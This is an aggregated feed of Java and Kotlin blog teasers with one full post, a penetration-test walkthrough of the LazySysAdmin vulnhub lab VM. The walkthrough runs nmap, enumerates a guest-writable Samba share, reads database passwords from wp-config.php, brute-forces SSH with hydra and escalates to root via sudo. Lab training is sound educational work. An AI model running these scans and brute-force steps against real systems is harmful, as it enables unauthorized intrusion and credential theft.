Feed aggregator

Spring Tips: Bootiful Kotlin Redux [Video]

Javalobby Syndicated Feed - Mon, 13-Nov-17 04:01

Hi, Spring fans! In this installment of Spring Tips, we’ll revisit Kotlin, leveraging more DSLs in both the Kotlin and Spring ecosystems.

Speaker: Josh Long

Categories: Java

Kotlin Features I Miss in Java

Javalobby Syndicated Feed - Mon, 13-Nov-17 01:01

Although I’m a big supporter of the Kotlin programming language, I still do a lot of Java programming on a daily basis for my employer. Since I’m aware of the great functionalities of Kotlin, I’m often struggling with Java, as it has some “pitfalls,” requires additional boilerplate, and misses many features.

In this post, I’d like to describe which Kotlin features I miss most when coding in Java.

Categories: Java

Implementing Custom Exceptions in Java

Javalobby Syndicated Feed - Sun, 12-Nov-17 23:01

<!-- Google Tag Manager (noscript) --> <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PDSRGWC" height="0" width="0" style="display:none;visibility:hidden"></iframe>

We already talked a lot about exception handling on this blog and described the differences between checked and unchecked exceptions, best practices, and common mistakes. If you’ve read these posts, you probably recognized a pattern. You should provide detailed information about the situation that caused the exception, and you should not remove anything that might be useful to the caller.

Categories: Java

Penetration Test Training – LazySysAdmin

codecentric Blog - Sun, 12-Nov-17 22:00

Today we’re going to start out training session with a fairly decent image from vulnhub.comLazySysAdmin: 1.
To use this image, just download, unzip and throw it against a running virtualbox.

Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 ( here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r
 Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------    08:00:27:6d:95:4e   1      60    Unknown vendor

Ah, right,, that’s fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:

$ export ip=""
$ echo $ip

Nice, let’s start a common scanning for services:

$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for
Host is up (1.0s latency).
Not shown: 994 closed ports
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host:
|_  error: Closing link: (nmap@ [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the account guest is authenticated as user, that is nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt

Let’s chat…

Having a look a the irc deamon …

$ telnet 6667

Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname... 

>>PASS none

:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address ( instead.

>>NICK Bla
>>USER blah blah blah blah

:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network Bla!blah@
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for
Host is up (0.00054s latency).

445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\\IPC$:
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\print$:
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\\share$:
|     Comment: Sumshare
|     Users: 0
|     Max Users: 
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Oh, nice! A guest writeable directory. Maybe we can snoop around…

$ mkdir share
$ mount_smbfs //guest:@$ share
$ cd share
$ tree -L 2 .
├── Backnode_files
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp

Really? A wordpress installation! Let us check this first.

$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser

Done. So we got some stuff here, but where to put it?

Land of the Apache

Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:

$ dirb http://$ip
DIRB v2.22
By The Dark Raver

START_TIME: Sat Nov  4 14:38:59 2017
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:36072)
+ (CODE:200|SIZE:77236)
+ (CODE:200|SIZE:92)
+ (CODE:403|SIZE:292)
... (lots of output)

Ok, by the time dirb is running we got some interesting directories to look at:


And some more. We’ve already seen those in the samba-enumeration. Let’s try our wordpress then…

$ curl -v
My name is togie.
My name is togie.
My name is togie.
My name is togie.

mhhh that togie again…mhhh, maybe…we can try ssh…

Serpentine water monster

Let us try our already filled login list

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active

[22][ssh] host:   login: togie   password: 12345

1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-04 20:36:42

Nice! So we login using togie and password 12345

$ ssh togie@$ip
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #

togie@'s password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

133 packages can be updated.
0 updates are security updates.


So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We got sudo…


$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt


$ cat proof.txt

Well done :)

Hope you learned a few things along the way.


Togie Mcdogie

Enjoy some random strings



The post Penetration Test Training – LazySysAdmin appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Lambda Calculus for Mortal Developers

Javalobby Syndicated Feed - Sat, 11-Nov-17 23:01

Lambda Calculus sounds like an arcane term that only functional programming wizards can understand. Nothing could be further from the truth. We use Lambda Calculus every day when we program. It is the most reducible form of all Functional Programming languages; the primitive building block of Functional Programming.

The Atoms of Lambda Calculus

Lambda Calculus is based on three basic building blocks: expressions, variables, and functions, which are combined to form other expressions.

Categories: Java

What Is Project Valhalla?

Javalobby Syndicated Feed - Fri, 10-Nov-17 23:01

For over three years, Project Valhalla has been a buzzword in the Java community, but even with all of this anticipation and foreboding, surprisingly little has been published on this important project. For some, it means the ability to create value types, and for others, it means reified generic runtime types.

But through all of the confusion and desire, Project Valhalla has a very specific purpose: To cease the requirement that Java developers choose between performance and abstraction. In this article, we will clear up the confusion about what Project Valhalla is and what it brings to the table. In doing so, we will examine what is and what is not included in the project as well as delve into the reasoning behind each of the major inclusions and exclusions.

Categories: Java

Beyond Headless Content: Layout as a Service in dotCMS

Javalobby Syndicated Feed - Fri, 10-Nov-17 14:01

Expect More Than Content

You should expect more than just content from your REST APIs. With "Layout as a Service", or LaaS-ie (groan), you can get the benefits of a traditional CMS-driven experience with the developer friendliness of CaaS. Layout as a Service makes app/CMS integrations (including previews) extraordinarily straightforward. Scroll down to "The Goods" for example code.

Give it a REST

In the CMS space, RESTful access to content (Content as a Service, CaaS, Headless CMS, etc.) is all the rage. With the rise of modern JavaScript frameworks and Single Page Apps, it is pretty easy to see why. Content as a Service allows the decoupling of the management of content from the presentation of that content and gives developers access to content in a familiar JSON format. This is a huge benefit for developers as they are no longer tied to developing in what they might consider old-fashioned CMS-based page presentations. Developers can develop (read: play) with the latest modern application technologies, Angular, React or whatever and access / inject business managed content into their apps via REST. The good news is that dotCMS has had these REST endpoints for years. Hooray Developers, right?

Categories: Java

Intel: Machines Without Storage (Only Memory) Are Coming

Javalobby Syndicated Feed - Fri, 10-Nov-17 10:01

Are traditional storage's days numbered? The push is on to perfect an open-source technology that allows your applications to keep data in memory — shut down the application and the machine — but the data will still be there when you need it.

Eric Kaczmarek, a senior Java performance architect in Intel’s Software Solution Group, spoke about this topic at the In-Memory Computing Summit Oct. 24 in San Francisco. His session was titled, "In-Persistent-Memory Computing with Java." 

Categories: Java

Inside the Java Virtual Machine (Part 3): Data Types [Video]

Javalobby Syndicated Feed - Fri, 10-Nov-17 04:01

This video discusses data types inside the JVM, including breakdowns of primitive and reference types and how data resides in the JVM's memory. This is next post of my series.

Categories: Java

Don't Fear the Lambda

Javalobby Syndicated Feed - Fri, 10-Nov-17 01:01

I just want to share my experience in using lambda expressions in Java. I must say that I was always very skeptical how they could be used, where they could be used, and why they should be used. This fear stopped my understanding of this very interesting concept for a long time.

Lambda Expressions

To begin with, lambda expressions are actually functions written in Java used in our methods as a parameter objects. Earlier, we used to define functions in Java only in methods, but now we can use them inside method bodies.

Categories: Java

Secure Your Java App With Spring Security, Thymeleaf, and Okta

Javalobby Syndicated Feed - Thu, 09-Nov-17 22:01

User management functions are required by a wide variety of apps and APIs, and it's a common use-case to partition access to parts of an application according to roles assigned to a user. This is the basis of role-based access control (RBAC). Okta manages these roles with groups. Users can belong to one or more groups. With the Okta Spring Security integration, these groups are automatically mapped to roles that can be called out in your application to grant or deny access. This is all done using common Spring Security annotations as you'll see below.

Okta’s Java dev team is working hard on our next generation SDK and integrations. With Okta’s integration for Spring Boot and Spring Security, you can wire up your Okta tenant to a Spring Boot application and take advantage of the built-in RBAC.

Categories: Java

Utilizing Apache NetBeans With JDK 9 [Snippet]

Javalobby Syndicated Feed - Thu, 09-Nov-17 14:01

Did you know that you can build Apache NetBeans from scratch today and utilize the latest JDK 9 features? Here is how to do it:

Clone the NetBeans Incubator sources to your machine:

Categories: Java

Java Quiz 4: Passing a Parameter to a Constructor

Javalobby Syndicated Feed - Thu, 09-Nov-17 07:01

Before we start with this week's quiz, here is the answer to Java Quiz 3: Handling Exceptions

  1. By passing the parameters 13 and 0 to the method print, the statement nr = accounts[i] / i2; causes an ArrayIndexOutOfBoundsException. The reason is that element 13 doesn't exist. The equation nr = accounts[i] / i2; first tries to access element 13, then divides the number by zero. The code doesn't handle ArrayIndexOutOfBoundsExceptions, but the Exception is a generic Exception handler. The statement System.out.print("T"); writes T to the standard output.

Categories: Java

Unit Testing vs. Component Testing in Lagom

Javalobby Syndicated Feed - Thu, 09-Nov-17 04:01

Let’s begin with the basic differences between unit testing and component testing, and then we will have a look at a practical application of unmanaged services in Lagom with its test cases.

Unit Testing and Component Testing

Unit testing involves the testing of individual units (classes) to demonstrate that the program executes as per the specification and that it validates the design and technical quality of that particular unit. The called components are replaced with stubs, simulators, or trusted components that are used to simulate the behavior of interfacing modules.

Categories: Java

Accessing the EntityManager From Spring Data JPA

Javalobby Syndicated Feed - Thu, 09-Nov-17 01:01

Spring Data JPA allows you to rapidly develop your data access layer through the use of Repository interfaces. Occasionally, you will need to access the EntityManager from Spring Data JPA. This post shows you how to access the EntityManager.


The purpose of the EntityManager is to interact with the persistence context. The persistence context will then manage entity instances and their associated lifecycle. This was covered in my blog post on the JPA Entity Lifecycle.

Categories: Java

Resolve Me, Implicitly

Javalobby Syndicated Feed - Wed, 08-Nov-17 22:01

Reading my posts, you can easily find that there is a topic that I care about a lot: Dependency management in the development process. There is a feature of the Scala programming language that I've liked since the beginning. Without any external library, it is possible to successfully implement various dependency injection mechanisms. In the past, I wrote about the Cake pattern. Now it’s time to talk about dependency injection through the use of implicits. Let's start the race!

The Problem: Dependency Injection


I have written many times about this topic, so I will not make a long introduction. To summarize, every time a component needs to send a message to another component, a dependency is defined between them. Components may be packages, classes, functions, and so on. Messages are always associated with methods or functions calls. Dependency between two components can have many levels of strength. If you want a complete explanation of the dependency concept, have a look at this post: Dependency. For the sake of completeness, let’s give an example of the simplest type of dependency: Association.

Categories: Java

Lambda Expressions in Java 8

Javalobby Syndicated Feed - Wed, 08-Nov-17 15:12

Let's start with lambda expressions. What are they? And how do they work?

I Googled lots of posts and YouTube videos before now to understand lambda expressions, but I found it difficult to understand because I haven't used any functional language before. So I decided to write a blog post to help people like me.

Categories: Java

A New Mocking Tool for Kotlin

Javalobby Syndicated Feed - Wed, 08-Nov-17 15:09

DinoOne pain point in testing Kotlin code is mocking. Have you ever tried to use a Mockito wrapper? It tries to hide this Java dinosaur in a DSL, but it still feels so unnatural and Java-ish

In this aMockKrticle, I'd like to present new shiny pure Kotlin mocking library — MockK. Its main philosophy is first-class support for Kotlin features. Thus, your code using coroutines or lambda blocks naturally fits into a simple DSL describing the behavior of objects.

Categories: Java

This Week in Spring: Java Proposals and Spring Shell

Javalobby Syndicated Feed - Wed, 08-Nov-17 10:01

Hi, Spring fans! Welcome to another installment of This Week in Spring! This week I’m in Antwerp, Belgium, for the amazing Devoxx (Belgium) event. I’m co-presenting with my friends Matt Raible and Mark Heckler on progressive web applications and reactive Spring. I’ll be joined by a lot of Pivotal and Spring teammates here so make sure to check the schedule.

Later this week I’ll be doing a joint webinar — Grails for the Spring Boot Developer — with Grails co-founder Jeff Scott Brown.

Categories: Java

Positional Parameters in Java: An Update

Javalobby Syndicated Feed - Wed, 08-Nov-17 04:01

Recently, I published an article titled Overcoming Positional Parameter Parsing in Java, where I presented a few methods that can be used to help programmers overcome the attitude of referring to command line arguments as args[0], args[1], and so on.

The article was viewed by many people, but most importantly, there was a lot of 'constructive' feedback. This, in other words, is to say that many pulled my ears and pointed out the flaws in the code.

Categories: Java

Thread Slivers eBook at Amazon

Syndicate content